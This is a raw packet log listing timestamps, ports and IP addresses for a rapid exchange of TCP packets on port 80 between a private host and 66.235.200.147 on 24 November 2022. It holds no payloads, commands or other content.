Nov 24, 2022 12:20:03.375987053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.375987053 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376004934 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376008987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376019955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376024008 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376041889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376044989 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376060009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376061916 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376079082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376080990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376095057 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376097918 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376121044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376148939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376167059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376185894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376192093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376205921 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376218081 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376224995 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376243114 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376260996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376279116 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376293898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376313925 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376329899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376348972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376368046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376385927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376405001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376422882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376440048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376455069 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376458883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376477003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376497984 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376517057 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376534939 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376540899 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376553059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376563072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376563072 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376571894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376590967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376610994 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376630068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376651049 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376652956 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376669884 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376688004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376704931 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376708031 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376725912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376739025 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376744986 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376764059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376782894 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376789093 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376801014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376818895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376833916 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376838923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376851082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376868963 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376878023 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376888037 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376895905 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376908064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376914978 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376925945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376931906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376944065 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376959085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376962900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376976013 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.376981020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.376993895 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377000093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377012968 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377018929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377029896 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377037048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377046108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377054930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377063036 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377074957 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377084017 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377093077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377099037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377110004 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377116919 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377129078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377140045 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377146959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377157927 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377165079 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377177954 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377183914 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377193928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377202988 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377213001 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377222061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377230883 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377238989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377248049 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377257109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377264977 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377275944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377284050 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377294064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377304077 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377311945 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377321959 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377329111 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377337933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377346992 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377357006 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377366066 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377377987 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377384901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377394915 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377402067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377419949 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377424955 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377435923 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377438068 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377455950 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377455950 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377474070 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.377474070 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377502918 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.377528906 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.384418011 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.385284901 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385310888 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385330915 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385349989 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385369062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385386944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385405064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385423899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385427952 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.385445118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385462046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385479927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385498047 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385515928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385543108 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.385555029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385574102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385592937 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385608912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385610104 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.385626078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385629892 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.385673046 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385691881 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385710001 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385729074 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385746956 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385766029 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385785103 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385817051 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385835886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385854959 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385874987 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385895014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385912895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385930061 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385948896 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385968924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.385987043 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386007071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386037111 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386046886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386110067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386149883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386168003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386187077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386205912 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386224985 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386245012 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386246920 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386265993 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386279106 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386285067 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386295080 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386302948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386322021 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386322975 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386341095 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386359930 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386368990 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386378050 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386396885 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386404037 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386415958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386434078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386451960 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386454105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386470079 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386471033 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386492014 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386509895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386517048 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386528969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386539936 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386547089 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386565924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386583090 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386583090 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386603117 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386621952 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386639118 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386657953 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386677980 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386686087 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386697054 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386707067 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386715889 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386734009 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386734009 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386753082 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386773109 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386778116 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386790991 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386810064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386820078 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386831045 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386850119 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386868954 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386898041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386898041 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386904955 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386924028 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386944056 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386949062 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386966944 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.386984110 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.386985064 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387003899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387022972 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387028933 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.387039900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387053967 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.387059927 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387077093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387095928 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387095928 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.387114048 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.387128115 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.389626026 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.390248060 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391318083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391338110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391357899 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391398907 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391407967 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391452074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391495943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391609907 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391628981 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391649008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391663074 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391727924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391771078 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391791105 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391809940 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391809940 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391828060 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391846895 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391856909 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391865969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391885042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391901970 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391902924 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391921997 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391940117 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391941071 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391963005 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.391967058 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.391989946 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392009974 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392028093 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392029047 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.392047882 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392047882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.392066002 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392083883 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392086029 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.392102003 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392121077 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392122984 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.392138958 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.392162085 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.395379066 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.403960943 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404000044 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404023886 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404046059 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404067039 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404088020 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404104948 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404114008 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404125929 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404148102 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404169083 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404169083 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404189110 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404207945 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404210091 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404228926 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404244900 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404256105 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404267073 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404277086 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404289007 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404320002 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404321909 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404342890 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404362917 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404383898 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404386044 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404402018 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404412985 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404422998 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404443979 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404448032 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404463053 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404484034 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404505968 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404512882 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404525042 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404541016 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404541969 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404561996 CET	80	49710	66.235.200.147	192.168.2.3
Nov 24, 2022 12:20:03.404570103 CET	49710	80	192.168.2.3	66.235.200.147
Nov 24, 2022 12:20:03.404582977 CET	80	49710	66.235.200.147	192.168.2.3
